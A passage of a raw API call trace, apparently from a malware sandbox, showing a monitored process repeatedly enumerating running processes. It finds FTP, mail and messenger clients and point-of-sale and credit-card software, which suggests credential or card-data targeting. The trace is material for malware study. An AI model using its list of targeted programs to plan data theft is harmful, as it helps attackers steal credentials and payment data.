Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0258.066] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.067] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0258.069] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.070] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.071] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.073] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0258.074] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0258.076] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0258.077] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0258.079] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0258.080] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0258.082] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0258.083] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0258.085] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0258.086] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0258.088] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0258.089] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0258.091] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0258.092] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0258.094] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0258.095] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0258.096] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0258.098] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0258.099] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0258.101] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0258.102] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0258.103] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0258.161] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0258.162] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0258.164] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0258.165] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0258.168] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0258.169] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0258.171] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0258.173] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0258.174] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0258.176] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0258.178] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0258.179] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0258.181] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0258.183] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0258.185] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0258.186] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0258.188] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0258.190] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0258.191] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0258.193] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0258.195] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0258.196] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0258.255] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0258.258] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0258.260] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0258.262] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0258.263] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0258.265] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0258.267] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0258.269] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0258.271] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0258.273] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0258.275] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0258.278] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0258.280] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0258.283] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0258.285] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0258.287] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0258.290] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0258.307] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0258.309] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0258.311] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0258.312] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0258.313] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.315] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.316] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.318] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0258.319] CloseHandle (hObject=0x1d14) returned 1 [0258.319] Sleep (dwMilliseconds=0x64) [0258.489] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0258.499] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.501] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.502] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.504] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.505] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.506] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.508] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.509] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.512] Process32Next (in: hSnapshot=0x1d14, 